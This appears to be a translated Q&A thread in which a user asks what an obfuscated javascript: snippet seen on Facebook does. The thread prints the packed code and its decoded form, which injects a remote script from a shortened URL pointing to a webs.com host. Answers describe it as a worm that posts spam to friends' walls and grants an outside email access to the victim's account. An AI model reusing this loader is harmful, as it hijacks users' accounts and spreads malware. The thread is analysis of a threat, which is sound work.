我刚看到Facebook上的这段javascript代码:
javascript:eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0:(a=(d=1).2("3")).4="5://6.7/8";9(d.b.c(a))',14,14,'javascript|document|createElement|script|src|http|is|gd|aNC9Zd|void||body|appendChild|'.split('|'),0,{}))
所以我用这个工具解压缩它: http://www.strictly-software.com/unpacker
以下代码显示:
javascript: (a = (d = document).createElement("script")).src = "http://is.gd/aNC9Zd";
void(d.body.appendChild(a))
我按照上面代码中的链接查找了一个非常大的.js文件。 有人可以找出该代码的作用吗?我已采取必要的预防措施 - 更改密码,清除缓存,cookie。它至今没有做任何事情,但我认为可能会在一段时间后发生等等。
感谢。
答案 0 :(得分:4)
看起来像facebook病毒传播到朋友的墙上。一个奇怪的确实因为它甚至有评论......
答案 1 :(得分:2)
重定向到
http://hackeralbania2012.webs.com/fb.js
在此处查看并展开网址:
关于它的作用,我不完全确定。 Chrome显然不希望我将其保存到磁盘,看到URL后我不确定我想:)
答案 2 :(得分:0)
请注意,我从未为facebook平台开发过:
它重定向到(http://hackeralbania2012.webs.com/fb.js)的javascript页面似乎想要获取管理员权限,以便在该时间点在浏览器中打开的任何帐户并写入墙
答案 3 :(得分:0)
它主要在运行时将fb.js脚本添加到页面并执行它。它列出了你的朋友,在他们的墙上张贴了http://www.facebook.com/pages/Suggest-Fan-Pages/138936739504438的链接,并添加了publikime@hotmail.com以便查看你的信息。